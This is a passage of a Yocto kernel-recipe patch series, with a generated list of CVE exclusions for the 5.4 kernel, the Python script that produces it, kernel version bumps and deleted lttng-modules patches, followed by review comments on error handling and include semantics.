9255# cpe-stable-backport: Backported in 5.4.270
9256CVE_CHECK_WHITELIST += "CVE-2024-26736"
9257
9258# fixed-version: only affects 5.15rc1 onwards
9259CVE_CHECK_WHITELIST += "CVE-2024-26737"
9260
9261# CVE-2024-26738 needs backporting (fixed from 6.8rc6)
9262
9263# CVE-2024-26739 needs backporting (fixed from 6.8rc6)
9264
9265# CVE-2024-26740 needs backporting (fixed from 6.8rc6)
9266
9267# fixed-version: only affects 6.1rc1 onwards
9268CVE_CHECK_WHITELIST += "CVE-2024-26741"
9269
9270# fixed-version: only affects 6.0rc1 onwards
9271CVE_CHECK_WHITELIST += "CVE-2024-26742"
9272
9273# CVE-2024-26743 needs backporting (fixed from 6.8rc6)
9274
9275# CVE-2024-26744 needs backporting (fixed from 6.8rc6)
9276
9277# CVE-2024-26745 needs backporting (fixed from 6.8rc7)
9278
9279# fixed-version: only affects 6.4rc1 onwards
9280CVE_CHECK_WHITELIST += "CVE-2024-26746"
9281
9282# CVE-2024-26747 needs backporting (fixed from 6.8rc6)
9283
9284# cpe-stable-backport: Backported in 5.4.270
9285CVE_CHECK_WHITELIST += "CVE-2024-26748"
9286
9287# cpe-stable-backport: Backported in 5.4.270
9288CVE_CHECK_WHITELIST += "CVE-2024-26749"
9289
9290# fixed-version: only affects 6.8rc5 onwards
9291CVE_CHECK_WHITELIST += "CVE-2024-26750"
9292
9293# cpe-stable-backport: Backported in 5.4.270
9294CVE_CHECK_WHITELIST += "CVE-2024-26751"
9295
9296# cpe-stable-backport: Backported in 5.4.270
9297CVE_CHECK_WHITELIST += "CVE-2024-26752"
9298
9299# fixed-version: only affects 5.18rc1 onwards
9300CVE_CHECK_WHITELIST += "CVE-2024-26753"
9301
9302# cpe-stable-backport: Backported in 5.4.270
9303CVE_CHECK_WHITELIST += "CVE-2024-26754"
9304
9305# fixed-version: only affects 6.7rc1 onwards
9306CVE_CHECK_WHITELIST += "CVE-2024-26755"
9307
9308# CVE-2024-26756 needs backporting (fixed from 6.8rc6)
9309
9310# CVE-2024-26757 needs backporting (fixed from 6.8rc6)
9311
9312# CVE-2024-26758 needs backporting (fixed from 6.8rc6)
9313
9314# CVE-2024-26759 needs backporting (fixed from 6.8rc6)
9315
9316# fixed-version: only affects 5.19rc1 onwards
9317CVE_CHECK_WHITELIST += "CVE-2024-26760"
9318
9319# fixed-version: only affects 5.19rc1 onwards
9320CVE_CHECK_WHITELIST += "CVE-2024-26761"
9321
9322# fixed-version: only affects 6.7rc1 onwards
9323CVE_CHECK_WHITELIST += "CVE-2024-26762"
9324
9325# cpe-stable-backport: Backported in 5.4.270
9326CVE_CHECK_WHITELIST += "CVE-2024-26763"
9327
9328# cpe-stable-backport: Backported in 5.4.270
9329CVE_CHECK_WHITELIST += "CVE-2024-26764"
9330
9331# CVE-2024-26765 needs backporting (fixed from 6.8rc6)
9332
9333# cpe-stable-backport: Backported in 5.4.270
9334CVE_CHECK_WHITELIST += "CVE-2024-26766"
9335
9336# CVE-2024-26767 needs backporting (fixed from 6.8rc5)
9337
9338# CVE-2024-26768 needs backporting (fixed from 6.8rc4)
9339
9340# CVE-2024-26769 needs backporting (fixed from 6.8rc3)
9341
9342# CVE-2024-26770 needs backporting (fixed from 6.8rc3)
9343
9344# CVE-2024-26771 needs backporting (fixed from 6.8rc3)
9345
9346# cpe-stable-backport: Backported in 5.4.270
9347CVE_CHECK_WHITELIST += "CVE-2024-26772"
9348
9349# cpe-stable-backport: Backported in 5.4.270
9350CVE_CHECK_WHITELIST += "CVE-2024-26773"
9351
9352# CVE-2024-26774 needs backporting (fixed from 6.8rc3)
9353
9354# CVE-2024-26775 needs backporting (fixed from 6.8rc2)
9355
9356# CVE-2024-26776 needs backporting (fixed from 6.8rc2)
9357
9358# cpe-stable-backport: Backported in 5.4.270
9359CVE_CHECK_WHITELIST += "CVE-2024-26777"
9360
9361# cpe-stable-backport: Backported in 5.4.270
9362CVE_CHECK_WHITELIST += "CVE-2024-26778"
9363
9364# cpe-stable-backport: Backported in 5.4.270
9365CVE_CHECK_WHITELIST += "CVE-2024-26779"
9366
9367# fixed-version: only affects 6.8rc4 onwards
9368CVE_CHECK_WHITELIST += "CVE-2024-26780"
9369
9370# fixed-version: only affects 6.8rc6 onwards
9371CVE_CHECK_WHITELIST += "CVE-2024-26781"
9372
9373# fixed-version: only affects 5.6rc1 onwards
9374CVE_CHECK_WHITELIST += "CVE-2024-26782"
9375
9376# fixed-version: only affects 5.18rc1 onwards
9377CVE_CHECK_WHITELIST += "CVE-2024-26783"
9378
9379# CVE-2024-26784 needs backporting (fixed from 6.8rc7)
9380
9381# fixed-version: only affects 6.6rc1 onwards
9382CVE_CHECK_WHITELIST += "CVE-2024-26785"
9383
9384# fixed-version: only affects 6.6rc1 onwards
9385CVE_CHECK_WHITELIST += "CVE-2024-26786"
9386
9387# CVE-2024-26787 needs backporting (fixed from 6.8rc7)
9388
9389# cpe-stable-backport: Backported in 5.4.271
9390CVE_CHECK_WHITELIST += "CVE-2024-26788"
9391
9392# CVE-2024-26789 needs backporting (fixed from 6.8rc7)
9393
9394# cpe-stable-backport: Backported in 5.4.271
9395CVE_CHECK_WHITELIST += "CVE-2024-26790"
9396
9397# cpe-stable-backport: Backported in 5.4.271
9398CVE_CHECK_WHITELIST += "CVE-2024-26791"
9399
9400# fixed-version: only affects 6.8rc4 onwards
9401CVE_CHECK_WHITELIST += "CVE-2024-26792"
9402
9403# cpe-stable-backport: Backported in 5.4.271
9404CVE_CHECK_WHITELIST += "CVE-2024-26793"
9405
9406# fixed-version: only affects 6.8rc6 onwards
9407CVE_CHECK_WHITELIST += "CVE-2024-26794"
9408
9409# CVE-2024-26795 needs backporting (fixed from 6.8rc7)
9410
9411# fixed-version: only affects 6.6rc1 onwards
9412CVE_CHECK_WHITELIST += "CVE-2024-26796"
9413
9414# CVE-2024-26797 needs backporting (fixed from 6.8rc7)
9415
9416# CVE-2024-26798 needs backporting (fixed from 6.8rc7)
9417
9418# fixed-version: only affects 5.18rc1 onwards
9419CVE_CHECK_WHITELIST += "CVE-2024-26799"
9420
9421# fixed-version: only affects 6.8rc5 onwards
9422CVE_CHECK_WHITELIST += "CVE-2024-26800"
9423
9424# cpe-stable-backport: Backported in 5.4.271
9425CVE_CHECK_WHITELIST += "CVE-2024-26801"
9426
9427# CVE-2024-26802 needs backporting (fixed from 6.8rc7)
9428
9429# CVE-2024-26803 needs backporting (fixed from 6.8rc7)
9430
9431# cpe-stable-backport: Backported in 5.4.271
9432CVE_CHECK_WHITELIST += "CVE-2024-26804"
9433
9434# cpe-stable-backport: Backported in 5.4.271
9435CVE_CHECK_WHITELIST += "CVE-2024-26805"
9436
9437# CVE-2024-26806 needs backporting (fixed from 6.8rc7)
9438
9439# fixed-version: only affects 6.4rc1 onwards
9440CVE_CHECK_WHITELIST += "CVE-2024-26807"
9441
9442# CVE-2024-26808 needs backporting (fixed from 6.8rc2)
9443
9444# CVE-2024-26809 needs backporting (fixed from 6.9rc1)
9445
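diff --git a/meta/recipes-kernel/linux/generate-cve-exclusions.py b/meta/recipes-kernel/linux/generate-cve-exclusions.py
new file mode 100755
index 0000000000..12ae3b0b1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/generate-cve-exclusions.py
@@ -0,0 +1,101 @@
+#! /usr/bin/env python3
+
+# Generate granular CVE status metadata for a specific version of the kernel
+# using data from linuxkernelcves.com.
+#
+# SPDX-License-Identifier: GPL-2.0-only
+
+import argparse
+import datetime
+import json
+import pathlib
+import re
+
+from packaging.version import Version
+
+
+def parse_version(s):
+ """
+ Parse the version string and either return a packaging.version.Version, or
+ None if the string was unset or "unk".
+ """
+ if s and s != "unk":
+ # packaging.version.Version doesn't approve of versions like v5.12-rc1-dontuse
+ s = s.replace("-dontuse", "")
+ return Version(s)
+ return None
+
+
+def main(argp=None):
+ parser = argparse.ArgumentParser()
+ parser.add_argument("datadir", type=pathlib.Path, help="Path to a clone of https://github.com/nluedtke/linux_kernel_cves")
+ parser.add_argument("version", type=Version, help="Kernel version number to generate data for, such as 6.1.38")
+
+ args = parser.parse_args(argp)
+ datadir = args.datadir
+ version = args.version
+ base_version = f"{version.major}.{version.minor}"
+
+ with open(datadir / "data" / "kernel_cves.json", "r") as f:
+ cve_data = json.load(f)
+
+ with open(datadir / "data" / "stream_fixes.json", "r") as f:
+ stream_data = json.load(f)
+
+ print(f"""
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at {datetime.datetime.now()} for version {version}
+
+python check_kernel_cve_status_version() {{
+ this_version = "{version}"
+ kernel_version = d.getVar("LINUX_VERSION")
+ if kernel_version != this_version:
+ bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+""")
+
+ for cve, data in cve_data.items():
+ if "affected_versions" not in data:
+ print(f"# Skipping {cve}, no affected_versions")
+ print()
+ continue
+
+ affected = data["affected_versions"]
+ first_affected, last_affected = re.search(r"(.+) to (.+)", affected).groups()
+ first_affected = parse_version(first_affected)
+ last_affected = parse_version(last_affected)
+
+ handled = False
+ if not last_affected:
+ print(f"# {cve} has no known resolution")
+ elif first_affected and version < first_affected:
+ print(f"# fixed-version: only affects {first_affected} onwards")
+ handled = True
+ elif last_affected < version:
+ print(f"# fixed-version: Fixed after version {last_affected}")
+ handled = True
+ else:
+ if cve in stream_data:
+ backport_data = stream_data[cve]
+ if base_version in backport_data:
+ backport_ver = Version(backport_data[base_version]["fixed_version"])
+ if backport_ver <= version:
+ print(f"# cpe-stable-backport: Backported in {backport_ver}")
+ handled = True
+ else:
+ # TODO print a note that the kernel needs bumping
+ print(f"# {cve} needs backporting (fixed from {backport_ver})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+ else:
+ print(f"# {cve} needs backporting (fixed from {last_affected})")
+
+ if handled:
+ print(f'CVE_CHECK_WHITELIST += "{cve}"')
+
+ print()
+
+
+if __name__ == "__main__":
+ main()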
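Review bot: `re.search(r"(.+) to (.+)", affected).groups()` in the loop in `main()` raises AttributeError when an `affected_versions` string does not have the `X to Y` shape, so a single malformed record in the third-party data aborts generation of the whole exclusion file. Every `CVE_CHECK_WHITELIST` line this script prints suppresses a cve-check finding, so the unparseable case should be handled explicitly and leave the CVE unlisted, as the existing "no affected_versions" branch does. `Version(backport_data[base_version]["fixed_version"])` has the same problem: it is not guarded against a missing key or a string that `packaging` rejects. The generated header records only a timestamp; also printing the commit id of the data clone would let a reviewer reproduce and audit the list. I cannot see the data files, so whether such records occur today is an assumption.

```python
        affected = data["affected_versions"]
        span = re.search(r"(.+) to (.+)", affected)
        if span is None:
            # Unparseable range: leave the CVE unlisted so cve-check still reports it.
            print(f"# Skipping {cve}, unparseable affected_versions")
            print()
            continue
        first_affected, last_affected = span.groups()
        # … unchanged: parse_version calls and status decision …
```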
diff --git a/meta/recipes-kernel/linux/kernel-devsrc.bb b/meta/recipes-kernel/linux/kernel-devsrc.bb
index 951e7635cc..887e1e2430 100644
--- a/meta/recipes-kernel/linux/kernel-devsrc.bb
+++ b/meta/recipes-kernel/linux/kernel-devsrc.bb
@@ -177,7 +177,7 @@ do_install() {
177 cp -a --parents $SYSCALL_TOOLS $kerneldir/build/ 177 cp -a --parents $SYSCALL_TOOLS $kerneldir/build/
178 fi 178 fi
179 179
180 cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 180 cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/ 2>/dev/null || :
181 fi 181 fi
182 182
183 if [ -d arch/${ARCH}/include ]; then 183 if [ -d arch/${ARCH}/include ]; then
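Review bot: The `2>/dev/null || :` added to the `cp` of `arch/arm/kernel/module.lds` (new side, the right-hand column as rendered) hides every failure of that copy, not only the case it is presumably meant for, where the file is absent from the kernel tree. A permission error or a full disk under `$kerneldir/build/` would now pass silently and produce an incomplete devsrc tree. Testing for the file keeps real errors visible: `[ ! -e arch/arm/kernel/module.lds ] || cp -a --parents arch/arm/kernel/module.lds $kerneldir/build/`. The enclosing `do_install` and its `if` block start and end outside the hunk.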
diff --git a/meta/recipes-kernel/linux/linux-dummy.bb b/meta/recipes-kernel/linux/linux-dummy.bb
index 95dc85ff2f..c56f8990de 100644
--- a/meta/recipes-kernel/linux/linux-dummy.bb
+++ b/meta/recipes-kernel/linux/linux-dummy.bb
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING.GPL;md5=751419260aa954499f7abaabaa882bbe"
9 9
10PROVIDES += "virtual/kernel" 10PROVIDES += "virtual/kernel"
11 11
12inherit deploy 12inherit deploy linux-dummy
13 13
14PACKAGES_DYNAMIC += "^kernel-module-.*" 14PACKAGES_DYNAMIC += "^kernel-module-.*"
15PACKAGES_DYNAMIC += "^kernel-image-.*" 15PACKAGES_DYNAMIC += "^kernel-image-.*"
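diff --git a/meta/recipes-kernel/linux/linux-yocto-dev.bb b/meta/recipes-kernel/linux/linux-yocto-dev.bb
index 06a9108fab..a1c0de9981 100644
--- a/meta/recipes-kernel/linux/linux-yocto-dev.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-dev.bb
@@ -10,8 +10,6 @@
 
 inherit kernel
 require recipes-kernel/linux/linux-yocto.inc
-# for ncurses tests
-inherit pkgconfig
 
 # provide this .inc to set specific revisions
 include recipes-kernel/linux/linux-yocto-dev-revisions.inc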
diff --git a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
index ec134e428c..f912304858 100644
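--- a/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb
@@ -11,13 +11,13 @@ python () {
  raise bb.parse.SkipRecipe("Set PREFERRED_PROVIDER_virtual/kernel to linux-yocto-rt to enable it")
 }
 
-SRCREV_machine ?= "0406e600800a40015d02b16ee6a4a46c6673c66f"
-SRCREV_meta ?= "4f6d6c23cc8ca5d9c39b1efc2619b1dfec1ef2bc"
+SRCREV_machine ?= "c93e75bc334ba00df2d66411a0d79c4378cf4af8"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
 
 SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;branch=${KBRANCH};name=machine \
  git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
 
-LINUX_VERSION ?= "5.4.98"
+LINUX_VERSION ?= "5.4.273"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
 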
diff --git a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
index ff03fd4197..2f94782471 100644
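--- a/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb
@@ -6,7 +6,7 @@ KCONFIG_MODE = "--allnoconfig"
 
 require recipes-kernel/linux/linux-yocto.inc
 
-LINUX_VERSION ?= "5.4.98"
+LINUX_VERSION ?= "5.4.273"
 LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
@@ -15,9 +15,9 @@ DEPENDS += "openssl-native util-linux-native"
 KMETA = "kernel-meta"
 KCONF_BSP_AUDIT_LEVEL = "2"
 
-SRCREV_machine_qemuarm ?= "fc95a485415d22eb772359b8d350c03b85c0cd1b"
-SRCREV_machine ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d"
-SRCREV_meta ?= "4f6d6c23cc8ca5d9c39b1efc2619b1dfec1ef2bc"
+SRCREV_machine_qemuarm ?= "d29f3f3a932319053ad24d84b087b0a57908c1bc"
+SRCREV_machine ?= "b6480d09d84d09e7560daa5c1d73917292ae30c0"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
 
 PV = "${LINUX_VERSION}+git${SRCPV}"
 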
diff --git a/meta/recipes-kernel/linux/linux-yocto.inc b/meta/recipes-kernel/linux/linux-yocto.inc
index 91df9c1cd5..2978c2fb90 100644
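--- a/meta/recipes-kernel/linux/linux-yocto.inc
+++ b/meta/recipes-kernel/linux/linux-yocto.inc
@@ -1,6 +1,7 @@
 SUMMARY = "Linux kernel"
 SECTION = "kernel"
 LICENSE = "GPLv2"
+HOMEPAGE = "https://www.yoctoproject.org/"
 
 LIC_FILES_CHKSUM ?= "file://COPYING;md5=d7810fab7487fb0aad327b76f1be7cd7"
 
@@ -55,3 +56,6 @@ do_install_append(){
 
 # enable kernel-sample for oeqa/runtime/cases's ksample.py test
 KERNEL_FEATURES_append_qemuall=" features/kernel-sample/kernel-sample.scc"
+
+# CVE exclusion
+include recipes-kernel/linux/cve-exclusion.inc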
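Review bot: The `include recipes-kernel/linux/cve-exclusion.inc` line added at the end of linux-yocto.inc uses `include`, which BitBake skips without an error when the file is not found, so a missing or misplaced exclusion file would change what the CVE scan reports for the kernel with no parse-time signal. If the file always ships with the layer, `require recipes-kernel/linux/cve-exclusion.inc` makes that dependency explicit; if the soft include is deliberate, the comment should say so. The same applies to the `include recipes-kernel/linux/cve-exclusion_5.4.inc` line added in linux-yocto_5.4.bb. The one-line `# CVE exclusion` comment could also say what the file is for, e.g. `# kernel CVE triage data consumed by the CVE scan (presumably entries already fixed or not applicable); review on every kernel bump`.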
diff --git a/meta/recipes-kernel/linux/linux-yocto_5.4.bb b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
index 76477f254d..108043bd98 100644
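--- a/meta/recipes-kernel/linux/linux-yocto_5.4.bb
+++ b/meta/recipes-kernel/linux/linux-yocto_5.4.bb
@@ -1,6 +1,7 @@
 KBRANCH ?= "v5.4/standard/base"
 
 require recipes-kernel/linux/linux-yocto.inc
+include recipes-kernel/linux/cve-exclusion_5.4.inc
 
 # board specific branches
 KBRANCH_qemuarm ?= "v5.4/standard/arm-versatile-926ejs"
@@ -12,16 +13,16 @@ KBRANCH_qemux86 ?= "v5.4/standard/base"
 KBRANCH_qemux86-64 ?= "v5.4/standard/base"
 KBRANCH_qemumips64 ?= "v5.4/standard/mti-malta64"
 
-SRCREV_machine_qemuarm ?= "28bc6b294bb1e49da671b2848234f9011efcad88"
-SRCREV_machine_qemuarm64 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d"
-SRCREV_machine_qemumips ?= "105568d1696f86625cf7bc30d8c5c921732de2f4"
-SRCREV_machine_qemuppc ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d"
-SRCREV_machine_qemuriscv64 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d"
-SRCREV_machine_qemux86 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d"
-SRCREV_machine_qemux86-64 ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d"
-SRCREV_machine_qemumips64 ?= "c76ba20ee1b1de859736f85f0210459c2104b8df"
-SRCREV_machine ?= "2d0a4ea86fe97f13a4bc2a92a097e4edb51d737d"
-SRCREV_meta ?= "4f6d6c23cc8ca5d9c39b1efc2619b1dfec1ef2bc"
+SRCREV_machine_qemuarm ?= "b7e0891bf4b281c4e29b86f708e10a3339670acc"
+SRCREV_machine_qemuarm64 ?= "ff75f0c7beb167391f0285dd2993394cd143a8a7"
+SRCREV_machine_qemumips ?= "650e43a19e625d1db9d8245cda27db7b86990398"
+SRCREV_machine_qemuppc ?= "0fb6546a09f90befecb11cd0f10274276e8a3021"
+SRCREV_machine_qemuriscv64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemux86-64 ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_machine_qemumips64 ?= "f59947f338319b1741db5dfac34f08399561ab25"
+SRCREV_machine ?= "fe901e2f4b156e9cf7ddb03f479f7339d28e398b"
+SRCREV_meta ?= "ecd382f3477fae022ad1881e4c39e810cdc3c760"
 
 # remap qemuarm to qemuarma15 for the 5.4 kernel
 # KMACHINE_qemuarm ?= "qemuarma15"
@@ -30,7 +31,7 @@ SRC_URI = "git://git.yoctoproject.org/linux-yocto.git;name=machine;branch=${KBRA
  git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-5.4;destsuffix=${KMETA}"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=bbea815ee2795b2f4230826c0c6b8814"
-LINUX_VERSION ?= "5.4.98"
+LINUX_VERSION ?= "5.4.273"
 
 DEPENDS += "${@bb.utils.contains('ARCH', 'x86', 'elfutils-native', '', d)}"
 DEPENDS += "openssl-native util-linux-native"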
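Review bot: The version-specific exclusion list is wired into this recipe only: `include recipes-kernel/linux/cve-exclusion_5.4.inc` is added after the `require` in linux-yocto_5.4.bb, while the linux-yocto-rt_5.4.bb and linux-yocto-tiny_5.4.bb sections move to the same `LINUX_VERSION ?= "5.4.273"` without showing an equivalent line. Unless those recipes pick the file up some other way (not visible in these hunks), the CVE scan for the rt and tiny kernels would keep listing issues already triaged for the standard kernel, which makes the three reports hard to compare. Adding the same `include recipes-kernel/linux/cve-exclusion_5.4.inc` next to their `require recipes-kernel/linux/linux-yocto.inc` would keep them consistent. Because such a list is only meaningful for the stable release it was produced against, a comment like `# cve-exclusion_5.4.inc must be refreshed whenever LINUX_VERSION changes` beside the include would help the next SRCREV bump.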
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0001-fix-strncpy-equals-destination-size-warning.patch b/meta/recipes-kernel/lttng/lttng-modules/0001-fix-strncpy-equals-destination-size-warning.patch
deleted file mode 100644
index 6f82488772..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0001-fix-strncpy-equals-destination-size-warning.patch
+++ /dev/null
@@ -1,42 +0,0 @@
1From cb78974394a9af865e1d2d606e838dbec0de80e8 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 5 Oct 2020 15:31:42 -0400
4Subject: [PATCH 01/16] fix: strncpy equals destination size warning
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Some versions of GCC when called with -Wstringop-truncation will warn
10when doing a copy of the same size as the destination buffer with
11strncpy :
12
13 ‘strncpy’ specified bound 256 equals destination size [-Werror=stringop-truncation]
14
15Since we unconditionally write '\0' in the last byte, reduce the copy
16size by one.
17
18Upstream-Status: Backport
19
20Change-Id: Idb907c9550817a06fc0dffc489740f63d440e7d4
21Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
22Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
23---
24 lttng-syscalls.c | 2 +-
25 1 file changed, 1 insertion(+), 1 deletion(-)
26
27diff --git a/lttng-syscalls.c b/lttng-syscalls.c
28index 49c0d81b..b43dd570 100644
29--- a/lttng-syscalls.c
30+++ b/lttng-syscalls.c
31@@ -719,7 +719,7 @@ int fill_table(const struct trace_syscall_entry *table, size_t table_len,
32 ev.u.syscall.abi = LTTNG_KERNEL_SYSCALL_ABI_COMPAT;
33 break;
34 }
35- strncpy(ev.name, desc->name, LTTNG_KERNEL_SYM_NAME_LEN);
36+ strncpy(ev.name, desc->name, LTTNG_KERNEL_SYM_NAME_LEN - 1);
37 ev.name[LTTNG_KERNEL_SYM_NAME_LEN - 1] = '\0';
38 ev.instrumentation = LTTNG_KERNEL_SYSCALL;
39 chan_table[i] = _lttng_event_create(chan, &ev, filter,
40--
412.25.1
42
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch b/meta/recipes-kernel/lttng/lttng-modules/0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch
deleted file mode 100644
index 90d7b0cf9c..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0002-fix-objtool-Rename-frame.h-objtool.h-v5.10.patch
+++ /dev/null
@@ -1,88 +0,0 @@
1From 8e4e8641961df32bfe519fd18d899250951acd1a Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Mon, 26 Oct 2020 13:41:02 -0400
4Subject: [PATCH 02/16] fix: objtool: Rename frame.h -> objtool.h (v5.10)
5
6See upstream commit :
7
8 commit 00089c048eb4a8250325efb32a2724fd0da68cce
9 Author: Julien Thierry <jthierry@redhat.com>
10 Date: Fri Sep 4 16:30:25 2020 +0100
11
12 objtool: Rename frame.h -> objtool.h
13
14 Header frame.h is getting more code annotations to help objtool analyze
15 object files.
16
17 Rename the file to objtool.h.
18
19Upstream-Status: Backport
20
21Signed-off-by: Michael Jeanson <mjeanson@efficios.com>
22Signed-off-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
23Change-Id: Ic2283161bebcbf1e33b72805eb4d2628f4ae3e89
24---
25 lttng-filter-interpreter.c | 2 +-
26 wrapper/{frame.h => objtool.h} | 19 ++++++++++++-------
27 2 files changed, 13 insertions(+), 8 deletions(-)
28 rename wrapper/{frame.h => objtool.h} (50%)
29
30diff --git a/lttng-filter-interpreter.c b/lttng-filter-interpreter.c
31index 21169f01..5d572437 100644
32--- a/lttng-filter-interpreter.c
33+++ b/lttng-filter-interpreter.c
34@@ -8,7 +8,7 @@
35 */
36
37 #include <wrapper/uaccess.h>
38-#include <wrapper/frame.h>
39+#include <wrapper/objtool.h>
40 #include <wrapper/types.h>
41 #include <linux/swab.h>
42
43diff --git a/wrapper/frame.h b/wrapper/objtool.h
44similarity index 50%
45rename from wrapper/frame.h
46rename to wrapper/objtool.h
47index 6e6dc811..3b997cae 100644
48--- a/wrapper/frame.h
49+++ b/wrapper/objtool.h
50@@ -1,18 +1,23 @@
51-/* SPDX-License-Identifier: (GPL-2.0 or LGPL-2.1)
52+/* SPDX-License-Identifier: (GPL-2.0-only or LGPL-2.1-only)
53 *
54- * wrapper/frame.h
55+ * wrapper/objtool.h
56 *
57 * Copyright (C) 2016 Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
58 */
59
60-#ifndef _LTTNG_WRAPPER_FRAME_H
61-#define _LTTNG_WRAPPER_FRAME_H
62+#ifndef _LTTNG_WRAPPER_OBJTOOL_H
63+#define _LTTNG_WRAPPER_OBJTOOL_H
64
65 #include <linux/version.h>
66
67-#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,6,0))
68-
69+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(5,10,0))
70+#include <linux/objtool.h>
71+#elif (LINUX_VERSION_CODE >= KERNEL_VERSION(4,6,0))
72 #include <linux/frame.h>
73+#endif
74+
75+
76+#if (LINUX_VERSION_CODE >= KERNEL_VERSION(4,6,0))
77
78 #define LTTNG_STACK_FRAME_NON_STANDARD(func) \
79 STACK_FRAME_NON_STANDARD(func)
80@@ -23,4 +28,4 @@
81
82 #endif
83
84-#endif /* _LTTNG_WRAPPER_FRAME_H */
85+#endif /* _LTTNG_WRAPPER_OBJTOOL_H */
86--
872.25.1
88
diff --git a/meta/recipes-kernel/lttng/lttng-modules/0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch b/meta/recipes-kernel/lttng/lttng-modules/0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch
deleted file mode 100644
index 2a100361ea..0000000000
--- a/meta/recipes-kernel/lttng/lttng-modules/0003-fix-btrfs-tracepoints-output-proper-root-owner-for-t.patch
+++ /dev/null
@@ -1,316 +0,0 @@
1From 5a3b76a81fd3df52405700d369223d64c7a04dc8 Mon Sep 17 00:00:00 2001
2From: Michael Jeanson <mjeanson@efficios.com>
3Date: Tue, 27 Oct 2020 11:42:23 -0400
4Subject: [PATCH 03/16] fix: btrfs: tracepoints: output proper root owner for
5 trace_find_free_extent() (v5.10)
6
7See upstream commit :
8
9 commit 437490fed3b0c9ae21af8f70e0f338d34560842b
10 Author: Qu Wenruo <wqu@suse.com>
11 Date: Tue Jul 28 09:42:49 2020 +0800
12
13 btrfs: tracepoints: output proper root owner for trace_find_free_extent()
14
15 The current trace event always output result like this:
16
17 find_free_extent: root=2(EXTENT_TREE) len=16384 empty_size=0 flags=4(METADATA)
18 find_free_extent: root=2(EXTENT_TREE) len=16384 empty_size=0 flags=4(METADATA)
19 find_free_extent: root=2(EXTENT_TREE) len=8192 empty_size=0 flags=1(DATA)
20 find_free_extent: root=2(EXTENT_TREE) len=8192 empty_size=0 flags=1(DATA)
21 find_free_extent: root=2(EXTENT_TREE) len=4096 empty_size=0 flags=1(DATA)
22 find_free_extent: root=2(EXTENT_TREE) len=4096 empty_size=0 flags=1(DATA)
23
24 T's saying we're allocating data extent for EXTENT tree, which is not
25 even possible.
26
27 It's because we always use EXTENT tree as the owner for
28 trace_find_free_extent() without using the @root from
29 btrfs_reserve_extent().
30
31 This patch will change the parameter to use proper @root for
32 trace_find_free_extent():
33
34 Now it looks much better:
35
36 find_free_extent: root=5(FS_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
37 find_free_extent: root=5(FS_TREE) len=8192 empty_size=0 flags=1(DATA)
38 find_free_extent: root=5(FS_TREE) len=16384 empty_size=0 flags=1(DATA)
39 find_free_extent: root=5(FS_TREE) len=4096 empty_size=0 flags=1(DATA)
40 find_free_extent: root=5(FS_TREE) len=8192 empty_size=0 flags=1(DATA)
41 find_free_extent: root=5(FS_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
42 find_free_extent: root=7(CSUM_TREE) len=16384 empty_size=0 flags=36(METADATA|DUP)
